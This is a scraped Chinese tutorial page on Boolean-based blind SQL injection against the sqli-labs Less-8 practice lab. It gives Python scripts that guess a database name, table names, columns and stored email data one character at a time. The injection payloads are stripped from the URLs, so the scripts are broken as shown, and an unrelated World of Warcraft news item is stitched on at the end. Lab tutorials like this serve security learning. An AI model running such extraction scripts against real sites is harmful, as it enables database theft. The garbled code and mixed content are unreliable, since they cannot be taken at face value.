天枫庄资源网 Design By www.wosibo.com

基于布尔的盲注

Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。

由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。

本次的示例就是Less-8。

通过进行下面的语句的注入测试

http://localhost/sqlilabs/Less-8/"
http://localhost/sqlilabs/Less-8/"htmlcode">
select field from table where id='userinput'

id参数是被单引号包括的。其他的信息我们就无法得到了。

得到数据库的名称

在得到数据库的名称之前,首先需要得到数据库的长度

http://localhost/sqlilabs/Less-8/"htmlcode">
def get_db_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
 for i in range(1,9):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

得到最后的结果的是security,是正确的。

得到数据库中的表信息

其实所有的SQL注入步骤都是类似的。首先得到数据库的名称(这一步不是必须的),然后得到当前数据库的表名称,然后得到表的字段,最后进行脱裤。这个步骤在前一章已经有说明了。

首先看一个简单的SQL盲注获取数据库表信息的写法。

http://localhost/sqlilabs/Less-8/"htmlcode">
http://localhost/sqlilabs/Less-8/"htmlcode">
def get_table_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
 for i in range(1,7):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

最后得到了第一个表名是emails,如果要得到其他的表名只需要将代码limit 0,1修改成为limit 1,1或者是其他的就可以了。

得到表名的列信息

在得到列名之前,同样需要知道在表中的字段长度。例如我们想要知道在emails表中的长度,那么就可以使用如下的语句来获取。

http://localhost/sqlilabs/Less-8/"htmlcode">
http://localhost/sqlilabs/Less-8/"htmlcode">
def get_column_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
 for i in range(1,3):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

通过上面这个代码,我们可以得到在emails表中存在的字段名称分别是idemail_id

脱裤

在得到了字段名称之后,接下来最重要的一步就是进行脱裤了。
在进行脱裤之前,我们首先判断在emails表中有多少条记录。

使用的语句如下:

http://localhost/sqlilabs/Less-8/"htmlcode">
http://localhost/sqlilabs/Less-8/"htmlcode">
def get_data():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/"
 chars = '.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
 for i in range(1,17):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

通过上面的这段代码就得到了内容是Dumb@dhakkan.com,其他的内容就同样通过这段方式得到数据了。这里就不作演示了。

总结

其实基于布尔盲注和基于时间的盲注都是需要编写大量的代码,就像本篇的文章一样。之前在简单的SQL注入中,一句SQL注入代码就可以解决的问题在这里就需要编写Python代码来进行大量的注入测试才能够得到内容。其实之前我也很少完整的用Python来编写SQL注入代码完成整个布尔盲注的注入过程。通过本章的编写,熟悉了使用Python代码完整地进行一次布尔盲注的过程了,学习了很多。以上就是这篇文章的全部内容了,希望对大家能有所帮助。

标签:
sql注入盲注,sql盲注,基于布尔的盲注

天枫庄资源网 Design By www.wosibo.com
广告合作:本站广告合作请联系QQ:858582 申请时备注:广告合作(否则不回)
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
天枫庄资源网 Design By www.wosibo.com

评论“SQL注入之基于布尔的盲注详解”

暂无SQL注入之基于布尔的盲注详解的评论...

《魔兽世界》大逃杀!60人新游玩模式《强袭风暴》3月21日上线

暴雪近日发布了《魔兽世界》10.2.6 更新内容,新游玩模式《强袭风暴》即将于3月21 日在亚服上线,届时玩家将前往阿拉希高地展开一场 60 人大逃杀对战。

艾泽拉斯的冒险者已经征服了艾泽拉斯的大地及遥远的彼岸。他们在对抗世界上最致命的敌人时展现出过人的手腕,并且成功阻止终结宇宙等级的威胁。当他们在为即将于《魔兽世界》资料片《地心之战》中来袭的萨拉塔斯势力做战斗准备时,他们还需要在熟悉的阿拉希高地面对一个全新的敌人──那就是彼此。在《巨龙崛起》10.2.6 更新的《强袭风暴》中,玩家将会进入一个全新的海盗主题大逃杀式限时活动,其中包含极高的风险和史诗级的奖励。

《强袭风暴》不是普通的战场,作为一个独立于主游戏之外的活动,玩家可以用大逃杀的风格来体验《魔兽世界》,不分职业、不分装备(除了你在赛局中捡到的),光是技巧和战略的强弱之分就能决定出谁才是能坚持到最后的赢家。本次活动将会开放单人和双人模式,玩家在加入海盗主题的预赛大厅区域前,可以从强袭风暴角色画面新增好友。游玩游戏将可以累计名望轨迹,《巨龙崛起》和《魔兽世界:巫妖王之怒 经典版》的玩家都可以获得奖励。